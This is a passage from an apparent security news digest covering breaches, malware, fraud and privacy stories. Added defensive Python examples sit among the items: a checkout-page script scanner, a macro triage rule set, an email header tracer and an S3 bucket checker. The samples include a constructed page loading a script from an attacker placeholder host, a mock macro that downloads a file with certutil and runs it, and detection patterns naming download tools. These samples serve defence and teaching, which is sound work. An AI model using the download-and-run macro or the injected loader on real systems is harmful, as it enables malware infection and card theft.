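    '<script src="https://cdn.example.edu/checkout.js"></script>'
    f"<script>{BASELINE_INLINE}</script>"
    "</head><body><form id=\"pay\"></form></body></html>"
)

# Constructed "skimmed" variant: one extra external loader and one extra
# inline script were added to the page (the listener body is intentionally empty).
SKIMMED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="https://stats-collector.attacker.test/j.js"></script>'
    "<script>document.getElementById('pay').addEventListener('submit', function (e) {});</script>"
    "</body>",
)


def scan_clean() -> List[str]:
    return find_unexpected_scripts(CLEAN_PAGE, ALLOWED_HOSTS, KNOWN_INLINE_HASHES)


def scan_skimmed() -> List[str]:
    return find_unexpected_scripts(SKIMMED_PAGE, ALLOWED_HOSTS, KNOWN_INLINE_HASHES)


if __name__ == "__main__":
    print("clean page  :", scan_clean())
    print("skimmed page:", scan_skimmed())
```

Run periodically against the live checkout page from outside the site (so it sees what customers see), this catches both the usual patterns: a new third-party loader and a modified or added inline block. The same allow-list and inline hashes map directly onto a `Content-Security-Policy` `script-src` directive with hash sources, which turns the detection into prevention in the browser.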

Premier Health Partners Discloses Breach, but No Notifications to Patients Yet

Premier Health Partners ("Premier Health") is providing notice of an incident that may impact the privacy of personal information for certain patients and clients of the Clinical Neuroscience Institute, Help Me Grow Brighter Futures, Samaritan Behavioral Health Inc. (SBHI), and CompuNet Clinical Laboratories. "While we have no evidence of any actual or attempted misuse of information at this time, we take this incident seriously and are providing information about the event, the steps we have taken and are taking in response, and additional precautions individuals may take to protect personal information, should they feel it is appropriate to do so." says the full notice.

Malware

Mekotio banking trojan imitates update alerts to steal Bitcoin

A versatile banking trojan targeting users in Latin America has been circulating in multiple countries including Mexico, Brazil, Chile, Spain, Peru, and Portugal. The malware ensures persistence on infected systems and has advanced capabilities such as planting backdoors, stealing bitcoins, and exfiltrating credentials. Dubbed Mekotio, the trojan collects sensitive information from victim hosts, such as firewall configuration, operating system information, whether admin privileges are enabled, and the status of any antivirus products installed.

One of the Most Destructive malware is Spreading Through UNESCO Website

CybleInc researchers came across the E-teams webpage on UNESCO's official website. Multiple click-bait links had been posted there to lure visitors into "spying" on other people's accounts. Clicking on these links redirected the visitor to a malicious website that asks for the username or email address of the account to be hacked; after collecting that information it demands payment before showing any (fake) results. The sole purpose of the scheme is to collect the visitor's bank account details.

Beware: AgentTesla Infostealer Now More Powerful

The operators behind the AgentTesla remote access Trojan have upgraded the infostealer with additional capabilities, including the ability to steal credentials from VPN clients, web browsers, FTP clients and email clients, according to Sentinel Labs. Agent Tesla is a commercially available .NET-based password-stealing Trojan with keylogging capabilities that has been active since at least 2014.

For six months, security researchers have secretly distributed an Emotet vaccine across the world

Most of the time, fighting malware is a losing game. Malware authors create their code, distribute payloads to victims via various methods, and by the time security firms catch up, attackers make small changes in their code to quickly regain their advantage in secrecy. Under the hood, Emotet is just a piece of software - just like everything else (malware = malicious software). As such, Emotet also has bugs. In the cyber-security industry, there's a very dangerous moral line when it comes to exploiting bugs in malware, a line many security companies won't cross, fearing they might end up harming the infected computers by accident. However, a rare bug can sometimes appear that is both safe to exploit and has devastating consequences for the malware itself. One such bug came to light earlier this year, discovered by James Quinn, a malware analyst working for Binary Defense.

Emotet malware strikes U.S. businesses with COVID-19 spam

The Emotet malware has begun spamming COVID-19 themed emails to U.S. businesses after being inactive for most of the pandemic in the USA. Before going dark on Feb 7th, 2020, Emotet was already sending COVID-19 themed spam to distribute malware in countries affected by the pandemic at the time. As the pandemic reached the USA around March, Emotet never had the chance to target U.S. businesses with COVID-19 related spam. With Emotet back in full swing after reawakening on July 17th, 2020, it has started spewing out COVID-19 spam, and this time it is targeting users in the USA.

PurpleWave—A New Infostealer from Russia

Infostealers are among the most profitable tools for cybercriminals, as information gathered from infected systems can be sold in the cybercrime underground or used for credential stuffing attacks. The Zscaler ThreatLabZ team came across a new infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user's system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system. The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.

AA20-227A: Phishing Emails Used to Deploy KONNI Malware

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic for Applications (VBA) macro to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts. The macro can change the document's font color from light grey to black (to fool the user into enabling content), check whether the Windows operating system is a 32-bit or 64-bit version, and construct and execute a command line to download additional files.
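Each of the behaviours CISA lists (an auto-run entry point, the font-colour reveal, the 32/64-bit branch, a built-up command line, a download primitive) leaves a recognisable pattern in the macro source, which is enough for first-pass triage once the VBA has been extracted from the document. The following is an added example, not CISA's advisory code or any vendor's detection: a rule set run over extracted macro text. The `SAMPLE_VBA` is a constructed look-alike that exhibits those behaviours; it is not the KONNI macro, and the URL in it is a placeholder.

```python
"""Heuristic triage of extracted VBA macro source.

Added example, not CISA's or a vendor's code. Feed it the macro text you
have already pulled out of the .doc/.docm (olevba or similar); it reports
which suspicious patterns are present and a coarse verdict.
"""
import re

# (rule name, regex over the macro source, what the pattern indicates)
RULES = [
    ("autorun", r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b",
     "runs automatically when the document is opened"),
    ("font_reveal", r"\.Font\.Color\s*=\s*(wdColorBlack|wdBlack|RGB\s*\(\s*0\s*,\s*0\s*,\s*0\s*\))",
     "turns hidden light-grey text black once content is enabled"),
    ("arch_check", r"(SysWOW64|PROCESSOR_ARCHITEW6432|ProgramW6432|#If\s+Win64)",
     "branches on 32-bit versus 64-bit Windows"),
    ("shell_exec", r"(\bShell\b|WScript\.Shell|Win32_Process)",
     "executes a constructed command line"),
    ("downloader", r"(certutil|bitsadmin|powershell|URLDownloadToFile|XMLHTTP|WinHttpRequest)",
     "fetches additional files from the internet"),
    ("string_build", r"(Chr\s*\(\s*\d+\s*\)|StrReverse\s*\()",
     "assembles strings at runtime to dodge simple signatures"),
]
RULES = [(name, re.compile(pat, re.I), desc) for name, pat, desc in RULES]


def scan_vba(source):
    """Return {rule_name: description} for every rule that matches."""
    return {name: desc for name, pat, desc in RULES if pat.search(source)}


def triage(source):
    """Verdict: auto-run plus execution or download is 'malicious';
    any other hit is 'suspicious'; no hits is 'clean'."""
    hits = scan_vba(source)
    if "autorun" in hits and ({"shell_exec", "downloader"} & hits.keys()):
        return "malicious", hits
    if hits:
        return "suspicious", hits
    return "clean", hits


# Constructed look-alike of the behaviour described in AA20-227A; NOT the
# real KONNI macro. example.invalid is a reserved placeholder domain.
SAMPLE_VBA = r"""
Sub AutoOpen()
    ' make the greyed-out "document" readable once macros are enabled
    ActiveDocument.Content.Font.Color = wdColorBlack
    Dim arch As String, cmd As String, wsh As Object
    If Len(Environ("ProgramW6432")) > 0 Then
        arch = "x64"
    Else
        arch = "x86"
    End If
    cmd = "certutil -urlcache -split -f " & Chr(34) & "http://example.invalid/" & arch & "/a.txt" & Chr(34) & " %TEMP%\a.txt"
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run cmd, 0, False
End Sub
"""

# Constructed benign macro for comparison.
BENIGN_VBA = r"""
Sub FormatReport()
    ' bold the header row of the first table
    ActiveDocument.Tables(1).Rows(1).Range.Font.Bold = True
End Sub
"""


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        verdict, hits = triage(src)
        print(label, verdict)
        for name, desc in hits.items():
            print("   ", name, "-", desc)
```

Rules like these are cheap to evade, so treat the output as a prioritisation aid for a sandbox run, not as a verdict; the reliable control remains blocking macros from internet-sourced documents at the Office policy level.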

Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities

The XCSSET malware family has been found in Xcode projects, "lead[ing] to a rabbit hole of malicious payloads," Trend Micro said on Thursday. In a paper exploring the wave of attacks, cybersecurity researchers said an "unusual" infection in a developer's project also included the discovery of two zero-day vulnerabilities. Xcode is a free integrated development environment (IDE) used in macOS for developing Apple-related software and apps. While it is not yet clear how XCSSET worms its way into Xcode projects, Trend Micro says that once embedded, the malware then runs when a project is built.

Script-Based Malware: A New Attacker Trend on Internet Explorer

Unit42 documented script-based malware through Internet Explorer browser exploits that infect Windows Operating System users, using scripting languages such as JScript, VBScript and even AutoIT.

270 million malware attacks occurred between January and March

According to Atlas VPN, 270 million malware incidents occurred in the first quarter of 2020. The data was gathered from three major cybersecurity firms: WatchGuard, Quick Heal, and Seqrite. While the data does show that the number of malware detections dropped in March (when 67 million incidents were recorded) compared to January (when 87 million incidents were tracked), the volume is still significant. Those who fell victim to the malware were predominantly ordinary home users, who had been forced to adapt to working from home when employers began sending their employees away from offices. Lax security procedures and a lack of good equipment provided a potential goldmine for disreputable hackers to take advantage of.

Crime

Crooks in Lamborghinis: how cybercriminals continue to exploit US coronavirus relief loans

A 20-year-old American scammer brags about having made almost a million dollars by stealing from the US funds directed to help small businesses that suffered from COVID-19. "It's an easy option to earn money," he said to CyberNews. Scammers like him continue to exploit business relief funds. Business owners do that as well. They steal enough to buy Lamborghinis.

RedCurl cybercrime group has hacked companies for three years

Security researchers have uncovered a new Russian-speaking hacking group that they say has focused for the past three years on corporate espionage, targeting companies across the world to steal documents that contain commercial secrets and employee personal data. Named RedCurl, the activities of this new group have been detailed in a 57-page report released by cyber-security firm Group-IB.

Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails

The Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing.

Boomer outsmarts hackers: “Kiss your cash goodbye”

John Richards, a 73-year-old former technician from North Yorkshire, turned the tables on hackers attempting to steal thousands of pounds in a complicated PayPal scam. Instead of falling victim, Richards took the money from the scammer and refuses to give it back. "Don't take friends for fools," Richards told the scammer and kept the money, £1380 in total. "Kiss goodbye to your cash." Richards spoke exclusively to CyberNews about the scam that almost caught him out. There are thousands of potential victims like Richards on Facebook. However, while his story turned out well in the end, others have not been so lucky. It's been estimated that the complex PayPal scam steals millions of pounds from victims every single month.

Cyber Adversaries Are Exploiting the Global Pandemic at Enormous Scale

No one could have predicted the degree and magnitude of change we would experience, both within and outside of the cybersecurity industry, in 2020. The first half of the year has demonstrated the dramatic scale at which cybercriminals and nation state actors are willing and able to leverage the global pandemic as an opportunity to launch targeted cyberattacks around the world. They have exploited the fear of individuals and the uncertainties of the pandemic as an attack strategy. And while these attacks cover a spectrum of strategies, they have heavily targeted the sudden expansion of new teleworkers -- literally millions of remote workers expanded the digital attack surface almost overnight -- along with their vulnerable home networks and devices and unprotected browsers.

BEC Scam Costs Trading Firm Virtu Financial $6.9 Million

High-speed trading firm Virtu Financial says it lost $6.9 million to a business email compromise scam in May. In its court filing, Virtu reports that an executive's email account was illegally accessed and used to send fraudulent emails to the company's accounting department, resulting in two wire transfers to a bank in China. The company is now suing its insurance carrier, Axis Insurance, for breach of contract after the insurer declined to cover the loss, according to legal documents filed in the case.

University Investigates Skimming of Credit Card Data

Michigan State University is investigating how hackers were able to steal credit card data from the school's online shopping site over a nine-month period. The skimming, which took place between October 2019 and June, appears to have affected about 2,600 customers of the university's online store, shop.msu.edu, according to the school's Monday announcement. Exposed data included customers' names, addresses and credit card numbers, according to the university, which says it's working with law enforcement and attempting to determine the exact number of victims. This skimming incident appears to be a Magecart-style attack, says Yonathan Klijnsma, a threat researcher at security firm RiskIQ, who has been tracking these types of attacks for the past several years.

Network intruders selling access to high-value companies

Breaching corporate networks and selling access to them is a business in and of itself. For many hackers, this is how they make their living, others do it forced by financial struggles to supplement their revenue. One actor claiming they returned to black hat activities after laying low for a while has recently churned out network access credentials for big and small companies across the world.

Hackers attack the Bundeswehr fleet service

The Bundestag administration has warned parliamentarians of a potentially serious hacker attack on the Bundeswehr's transport service. In a letter to the parliamentary groups of the Bundestag it says that BwFuhrpark reported that it had become the victim of a hacker attack. So far, the target, type and scope of the attack are still unknown. The attack could well be sensitive: BwFuhrpark, which is run by the Bundeswehr and operated together with Deutsche Bahn, has organized the transport service for the Bundestag for several years.

US Seizes $2 Million in Cryptocurrency From Terrorist Groups

The seizure of bitcoins and other virtual currencies by the Justice Department - along with the FBI, Department of Homeland Security and IRS - is the federal government's largest seizure of cryptocurrency related to terrorism financing, according to Thursday's announcement. U.S. law enforcement also seized 300 cryptocurrency accounts, four websites and four Facebook pages all designed to raise funds for three terrorist organizations: ISIS, al Qaeda and the al Qassam Brigades, the military wing of Hamas. U.S. officials are also seeking to confiscate additional funds as investigations and forfeiture proceedings continue.

Texas Man Sentenced to 57 Months for Computer Hacking and Aggravated Identity Theft

Tyler C. King, age 31, of Dallas, Texas, was sentenced to 57 months in prison for computer fraud and aggravated identity theft in connection with his hacking of a New York-based technology company. The announcement was made by United States Attorney Grant C. Jaquith and Thomas F. Relford, Special Agent in Charge of the Albany Field Office of the Federal Bureau of Investigation (FBI). United States Attorney Grant C. Jaquith stated: "Tyler King hacked into a major technology company, damaged its systems, stole its data, and laughed about it, all from the comfort of his sofa in Texas. He will now serve 57 months in federal prison. Those interested in hiding behind their keyboards to steal information and damage property should take the sentence as a stark reminder that computer hacking is a serious business with serious consequences. I thank the FBI for its exceptional work in bringing King to justice."

Phishing Threat Preys on Desperate Business Owners

For the past few months, businesses across the nation have suffered from the financial strain brought on by COVID-19. Government relief has become a major concern as businesses struggle to stay afloat. The Cofense Phishing Defense Center (PDC) has taken notice of a new phishing campaign that once again aims to abuse Covid-related fear and uncertainty. This campaign imitates the U.S. Small Business Administration (SBA) to harvest the credentials of business owners who may be expecting the administration's assistance. While the spoofed address for this attack is one the SBA uses and is even listed on their website, one brief look at this example's "Received" path shows it did not originate from the SBA.
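The "Received" path the PDC refers to is the chain of Received: headers each relay prepends, so the bottom-most one records where the message actually entered the mail system, whatever the From: line claims. The following is an added example, not Cofense's tooling, that walks that chain for a constructed message, compares the originating hop and the Return-Path with the From: domain, and reads the receiving server's Authentication-Results. sba.gov is the real agency domain; every relay hostname and address in the sample is made up.

```python
"""Trace the Received: chain of a suspected brand-spoofing email.

Added example, not Cofense's code. Received: headers are prepended by each
relay, so reading them bottom-up gives the path from origin to mailbox.
"""
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message: the From: claims sba.gov, the path says otherwise.
RAW_MESSAGE = """Received: from mx-in.victim.example (mx-in.victim.example [192.0.2.10])
\tby mail.victim.example with ESMTP id 7a1; Mon, 10 Aug 2020 09:14:02 -0400
Received: from relay3.bulk-sender.example (relay3.bulk-sender.example [203.0.113.77])
\tby mx-in.victim.example with ESMTPS; Mon, 10 Aug 2020 09:14:01 -0400
Received: from [198.51.100.23] (unknown [198.51.100.23])
\tby relay3.bulk-sender.example with ESMTPA id 9f2; Mon, 10 Aug 2020 09:13:58 -0400
Authentication-Results: mx-in.victim.example; spf=fail smtp.mailfrom=sba.gov
Return-Path: <bounce@bulk-sender.example>
From: "SBA Disaster Loans" <disastercustomerservice@sba.gov>
To: owner@victim.example
Subject: SBA Application - Review and Proceed

Please review your application at ...
"""

FROM_RE = re.compile(r"^\s*from\s+(\S+)", re.I)
BY_RE = re.compile(r"\bby\s+(\S+)", re.I)


def received_hops(msg):
    """Return [(from_host, by_host), ...] oldest hop first."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        text = " ".join(hdr.split())          # unfold continuation lines
        f, b = FROM_RE.search(text), BY_RE.search(text)
        hops.append((f.group(1) if f else "?", b.group(1) if b else "?"))
    return hops


def domain_of(addr):
    """Lower-cased domain part of an address header, '' if absent."""
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def assess(raw):
    """Return (hops, reasons); an empty reasons list means nothing stood out."""
    msg = message_from_string(raw)
    hops = received_hops(msg)
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    reasons = []
    if rp_dom and rp_dom != from_dom and not rp_dom.endswith("." + from_dom):
        reasons.append(f"Return-Path domain {rp_dom} differs from From domain {from_dom}")
    if hops:
        origin, first_relay = hops[0][0].strip("[]"), hops[0][1]
        if not (origin.endswith(from_dom) or first_relay.endswith(from_dom)):
            reasons.append(f"first hop {hops[0][0]} -> {first_relay} is outside {from_dom}")
    auth = msg.get("Authentication-Results", "")
    if "spf=fail" in auth or "dkim=fail" in auth:
        reasons.append("authentication failed: " + auth.split(";", 1)[-1].strip())
    return hops, reasons


if __name__ == "__main__":
    hops, reasons = assess(RAW_MESSAGE)
    for i, (src, dst) in enumerate(hops):
        print(f"hop {i}: {src} -> {dst}")
    for r in reasons:
        print("flag:", r)
```

Only the Received: header added by your own edge server is trustworthy; everything below it was written by the sender's side and can be forged, which is why the mismatch checks are combined with the SPF result your server computed itself.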

Phishing Campaign Spoofs SBA Loan Offer

Malwarebytes reports that a newly discovered phishing campaign is spoofing a U.S. Small Business Administration loan offer in an attempt to steal banking credentials and other personal data. This campaign appears to have started in early August, the security firm reports. Another phishing attack in April also used spoofed SBA messages, but it was created to spread a dropper called GuLoader, which is used to distribute other malware.

ATM Hackers Have Picked Up Some Clever New Tricks

During Black Hat, Kevin Perlow, the technical threat intelligence team lead at a large, private financial institution, analyzed two cash-out tactics that represent different current approaches to jackpotting. One looked at the ATM malware known as INJX_Pure, first seen in spring 2019. INJX_Pure manipulates both the eXtensions for Financial Services (XFS) interface---which supports basic features on an ATM, like running and coordinating the PIN pad, card reader, and cash dispenser---and a bank's proprietary software together to cause jackpotting. The original malware samples were uploaded to scanners from Mexico and then later from Colombia, but little is known about the actors using INJX_Pure. The malware is significant, though, because it is tailored to the ATMs of a specific bank, likely in a specific region, indicating that it can be worth it to develop even limited-use or targeted jackpotting malware rather than only focusing on tools that will work around the world.

Privacy

Homeland Security Details New Tools For Extracting Device Data at US Borders

Travelers heading to the US have many reasons to be cautious about their devices when it comes to privacy. A report released Thursday from the Department of Homeland Security provides even more cause for concern about how much data border patrol agents can pull from your phones and computers. In a Privacy Impact Assessment dated July 30, the DHS detailed its US Border Patrol Digital Forensics program, specifically its development of tools to collect data from electronic devices. For years, DHS and border agents were allowed to search devices without a warrant, until a court found the practice unconstitutional in November 2019. In 2018, the agency searched more than 33,000 devices, compared to 30,200 searches in 2017 and just 4,764 searches in 2015. Civil rights advocates have argued against this kind of surveillance, saying it violates people's privacy rights.

Police Use of Facial Recognition Violates Human Rights, UK Court Rules

An appeals court ruled that police use of facial recognition technology in the UK has "fundamental deficiencies" and violates several laws. South Wales Police began using automated facial recognition technology on a trial basis in 2017, deploying a system called AFR Locate overtly at several dozen major events such as soccer matches. Police matched the scans against watchlists of known individuals to identify persons who were wanted by the police, had open warrants against them, or were in some other way persons of interest. In 2019, Cardiff resident Ed Bridges filed suit against the police, alleging that having his face scanned in 2017 and 2018 was a violation of his legal rights. Although he was backed by UK civil rights organization Liberty, Bridges lost his suit in 2019, but the Court of Appeal overturned that ruling, finding that the South Wales Police facial recognition program was unlawful.

TikTok Tracked User Data Using Tactic Banned By Google

TikTok skirted a privacy safeguard in Google's Android operating system to collect unique identifiers from millions of mobile devices, data that allows the app to track users online without allowing them to opt out, a Wall Street Journal analysis has found. The tactic, which experts in mobile-phone security said was concealed through an unusual added layer of encryption, appears to have violated Google policies limiting how apps track people and wasn't disclosed to TikTok users. TikTok ended the practice in November, the Journal's testing showed.

TSA considers new system for flyers without ID

According to a solicitation to potential contractors published last week, the Transportation Security Administration (TSA) wants to outsource its current questioning of airline passengers without ID, and its decisions about which travelers without ID to allow to travel and which to prevent from flying, to a fee-based system operated through a cellphone app provided by a private contractor and based on (secret) commercial databases. There's some good news and some bad news in the TSA's posting of this Request for Information.

Clearview AI landed a new facial recognition contract with ICE

The controversial facial recognition software maker Clearview AI has a new contract with ICE, the most controversial U.S. government agency. Clearview was already known to work with the branch of Homeland Security fiercely criticized for implementing the Trump administration's harsh immigration policies. The new contract makes it clear that relationship is ongoing --- and that Clearview isn't just playing a bit part in tech's lucrative scrum for federal contracts. First spotted by tech watchdog Tech Inquiry, the new contract is worth $224,000 and will provide the agency with what is only described as "Clearview licenses," likely just access to the company's software services.

Medical records for more than 61,000 cardiac patients left unsecured online

On August 2, a researcher contacted DataBreaches.net about a misconfigured Amazon S3 storage bucket they had discovered. The bucket contained more than 60,000 recently updated records with protected health information of patients seen by or involved with the BioTel Heart cardiac data network. Sometimes it is easy to figure out the likely owner of an Amazon storage bucket; other times it is difficult or downright impossible. This one was somewhat difficult to attribute, even though the records all related to BioTel Heart. The records were scanned faxes that appeared to involve BioTel Heart seeking medical records on patients that had been referred to them by providers. BioTel was requesting the patients' records because their claims for insurance reimbursement had been denied and they needed more records to support their appeal of the denied benefits.
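A bucket ends up readable by the world through one of two settings: a bucket policy with an anonymous principal, or an ACL grant to the AllUsers/AuthenticatedUsers groups. The following is an added example, not DataBreaches.net's or BioTel's code, that checks both from the JSON shapes `GetBucketPolicy` and `GetBucketAcl` return, so saved CLI output can be reviewed offline. The bucket name, role and account ID in the samples are constructed.

```python
"""Flag an S3 bucket whose policy or ACL grants anonymous access.

Added example. Works on the JSON returned by `aws s3api get-bucket-policy`
(the "Policy" document) and `aws s3api get-bucket-acl`.
"""
import json

ANON_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _as_list(v):
    return v if isinstance(v, list) else [v]


def _principal_is_anonymous(principal):
    """True for Principal "*" or {"AWS": "*"} / {"AWS": [..., "*"]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_policy_statements(policy):
    """Allow statements open to anyone, noting whether a Condition narrows them
    (a Condition may still leave the bucket public; review it by hand)."""
    out = []
    for st in _as_list(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _principal_is_anonymous(st.get("Principal")):
            continue
        out.append({
            "sid": st.get("Sid", ""),
            "actions": _as_list(st.get("Action", [])),
            "conditional": bool(st.get("Condition")),
        })
    return out


def public_acl_grants(acl):
    """ACL grants to the AllUsers / AuthenticatedUsers groups as (group, permission)."""
    out = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in ANON_GRANTEES:
            out.append((grantee["URI"].rsplit("/", 1)[-1], g.get("Permission")))
    return out


def is_public(policy, acl):
    return bool(public_policy_statements(policy) or public_acl_grants(acl))


# Constructed samples (bucket, role and account ID are placeholders).
LEAKY_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "AllowAppRole", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/fax-ingest"},
     "Action": ["s3:PutObject"], "Resource": "arn:aws:s3:::example-faxes/*"},
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-faxes/*"}
  ]}""")
LEAKY_ACL = {"Grants": [
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"}]}

TIGHT_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:role/fax-ingest"},
     "Action": ["s3:GetObject", "s3:PutObject"], "Resource": "arn:aws:s3:::example-faxes/*"}]}
TIGHT_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id"}, "Permission": "FULL_CONTROL"}]}


if __name__ == "__main__":
    for label, pol, acl in (("leaky", LEAKY_POLICY, LEAKY_ACL), ("tight", TIGHT_POLICY, TIGHT_ACL)):
        print(label, "public" if is_public(pol, acl) else "private",
              public_policy_statements(pol), public_acl_grants(acl))
```

The per-bucket check catches the misconfiguration after the fact; the account-level S3 Block Public Access setting prevents either grant from taking effect in the first place and is the control to turn on for anything that holds health records.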

A simple telephony honeypot received 1.5 million robocalls across 11 months

In an award-winning paper presented at the USENIX Security conference this week, a team of academics from North Carolina State University presented findings from operating a massive telephony honeypot for 11 months for the sole purpose of tracking, identifying, and analyzing the robocalling phenomenon in the US. NCSU researchers said they ran 66,606 telephone lines between March 2019 and January 2020, during which time they received 1,481,201 unsolicited calls, even though they never made their phone numbers public via any source. The research team said each line received an unsolicited call every 8.42 days on average, but most of the robocall traffic came in sudden surges they called "storms" that happened at regular intervals, suggesting that robocallers operate in short-burst, well-organized campaigns.

Leaked Documents Reveal What TikTok Shares with Authorities — in the U.S.

Documents published in the BlueLeaks trove, which was hacked by someone claiming a connection to Anonymous and published by the transparency collective Distributed Denial of Secrets, show the information that TikTok shared with U.S. law enforcement in dozens of cases. The documents also reveal that two representatives with bytedance.com email addresses registered on the website of the Northern California Regional Intelligence Center, a fusion center that covers the Silicon Valley area. And they show that the Federal Bureau of Investigation and Department of Homeland Security actively monitored TikTok for signs of unrest during the George Floyd protests.

Politics

YouTube Bans Videos Containing Hacked Information That Could Interfere With the Election

As Democrats and Republicans prepare to hold their national conventions starting next week, YouTube on Thursday announced updates to its policies on deceptive videos and other content designed to interfere with the election. The world's largest video platform, with more than 2 billion users a month, will ban videos containing information that was obtained through hacking and could meddle with elections or censuses. That would include material like hacked campaign emails with details about a candidate. The update follows the announcement of a similar rule that Google, which owns YouTube, unveiled earlier this month banning ads that contain hacked information. Google will start enforcing that policy Sept. 1. YouTube also said it will take down videos that encourage people to interfere with voting and other democratic processes. For example, videos telling people to create long lines at polling places in order to stifle the vote won't be allowed.

Belarus has shut down the internet amid a controversial election

Internet connectivity and cellular service in Belarus have been down since Sunday evening, after sporadic outages early that morning and throughout the day. The connectivity blackout, which also includes landline phones, appears to be a government-imposed outage that comes amid widespread protests and increasing social unrest over Belarus' presidential election Sunday. The ongoing shutdown has further roiled the country of about 9.5 million people, where official election results this morning indicated that five-term president Aleksandr Lukashenko had won a sixth term with about 80 percent of the vote. Around the country, protests against Lukashenko's administration, including criticisms of his foreign policy and handling of the Covid-19 pandemic, grew in the days leading up to the election and exploded on Sunday night. The government has responded to the protests by mobilizing police and military forces, particularly in Minsk, the capital. Meanwhile, opposition candidates and protesters say the election was rigged and believe the results to be illegitimate.

The Clean Network – United States Department of State

The Clean Network program is the Trump Administration's comprehensive approach to safeguarding the nation's assets including citizens' privacy and companies' most sensitive information from aggressive intrusions by malign actors, such as the Chinese Communist Party. The Clean Network addresses the long-term threat to data privacy, security, human rights and principled collaboration posed to the free world from authoritarian malign actors. The Clean Network is rooted in internationally accepted digital trust standards. It represents the execution of a multi-year, all-of-government, enduring strategy, built on a coalition of trusted partners, and based on rapidly changing technology and economics of global markets.

Misc

Internet disruption hits Belarus on election day

Network telemetry from the NetBlocks internet observatory confirms that internet connectivity in Belarus has been partially disrupted as of Sunday 9 August 2020 amidst presidential elections.

Mozilla Fires Servo Devs and Security Response Teams

The Mozilla Corporation announced that it is laying off approximately 250 staff members in a move to shore up the organization's financial future. The layoffs were publicly announced in a blog post. Employees were notified hours before, earlier this morning, via an email sent by Mitchell Baker, Mozilla Corporation CEO and Mozilla Foundation Chairwoman. In a Twitter post Michael Purzynski said they killed the entire threat management team, so Mozilla is now without a detection and incident response team.

NSA Owns Everything (2015)

As the Snowden leaks continue to dribble out, it has become increasingly obvious that most nations planning for "cyber-war" have been merely sharpening knives for what looks like an almighty gunfight. We have to ask ourselves a few tough questions, the biggest of which just might be: "If the NSA was owning everything in sight (and by all accounts they have) then how is it that nobody ever spotted them?"

FireEye’s bug bounty program goes public

On Wednesday, the cybersecurity firm said the scheme is now open to any researcher or bug bounty hunter willing to take a look at in-scope FireEye domains and services. Bug bounty programs, hosted on platforms including HackerOne and Bugcrowd, are a way to 'crowdsource' the hunt for vulnerabilities. Thousands of organizations now offer bug bounties to researchers who privately disclose security flaws they find through these programs and provide both financial rewards and credit in return.

Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw

Ziggo has informed customers that an expert found a weakness in the Wifibooster Ziggo C7, a device used to extend WiFi coverage. The problem is that the emails look like phishing and have made customers suspicious.

Why & Where You Should You Plant Your Flag

As KrebsOnSecurity observed back in 2018, many people --- particularly older folks --- proudly declare they avoid using the Web to manage various accounts tied to their personal and financial data --- including everything from utilities and mobile phones to retirement benefits and online banking services. From that story: "The reasoning behind this strategy is as simple as it is alluring: What's not put online can't be hacked. But increasingly, adherents to this mantra are finding out the hard way that if you don't plant your flag online, fraudsters and identity thieves may do it for you."

Stalkerware Phone Spying Apps Have Escaped Google's Ad Ban

Several companies offering phone-spying apps, known as "stalkerware", are still advertising in Google search results despite the search giant's ban, which has already taken effect, TechCrunch has found. These controversial apps are often pitched to help parents snoop on their child's calls, messages, apps and other private data under the guise of helping to protect against online predators. But some repurpose these apps to spy on their spouses, often without their permission. It's a problem that the wider tech industry has worked to tackle. Security firms and antivirus makers are working to combat the rise of stalkerware, and federal authorities have taken action when app makers have violated the law.

Zoom Sued By Consumer Group For Misrepresenting Its Encryption Protections

A consumer advocacy group is suing Zoom and seeking millions of dollars in damages, accusing the company of misleading its users about the strength of its encryption protections. The nonprofit group Consumer Watchdog is also accusing the videoconferencing company of deceiving users about the extent of its links with China and the fact that some calls between people in North America were routed through servers in China. That raises the danger Beijing could steal or demand access to the contents of those calls, according to a copy of the lawsuit, which was shared exclusively with The Cybersecurity 202.

Threema joins the ranks of E2EE chat apps that support encrypted video calls

